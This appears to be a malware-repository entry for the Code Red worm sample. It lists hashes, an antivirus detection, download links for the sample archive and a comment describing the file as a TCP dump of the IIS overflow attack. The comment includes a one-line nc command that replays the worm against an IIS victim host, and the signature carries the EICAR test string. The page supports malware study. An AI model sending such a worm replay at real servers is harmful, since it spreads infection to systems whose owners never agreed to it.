Skip navigation.
Home

win_codered_a

info: 4039 Jul 16 2001 codered.exe
md5sum: 6f5767ec5a9cc6f7d195dde3c3939120 codered.exe
sha1sum: 4605a2d0aae8fa5ec0b72973bea928762cc6d002 codered.exe

Threat: CodeRed Worm
File: C:\malware\codered.exe
Date found: Tuesday, December 13, 2005 8:57:29 PM
A/V: http://www.f-secure.com/v-descs/bady.shtml

Links are broken.

Use this:

http://www.offensivecomputing.net/files/active/0/win_codered_a.zip
http://www.offensivecomputing.net/files/active/0/win_codered_a_strings.zip

Note: This is a TCP stream dump, not an .EXE

This isn't actually an MZ .exe or anything. It's the IIS Unicode buffer-overflow-whatever-explosion-thingy attack. That jumps into the following shellcode/wormcode. (I've lost track of all of the exploits surrounding IIS and Unicode.) eEye wrote up a pretty good analysis of this, if I remember. This one, and "Code Red ver.2". I'll paste the URLs here later so save people the trouble of looking it up.
Now that I think about it... eEye has samples of each worm up on their web site. And to my naked eye, I think that they're identical to this one. Only not named "codered.EXE".

By the way, I don't recommend anyone doing this but, if you need to revive this worm for testing/analysis, just do:

zcat win_codered_a.zip | nc iis.victim.com 80

--
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*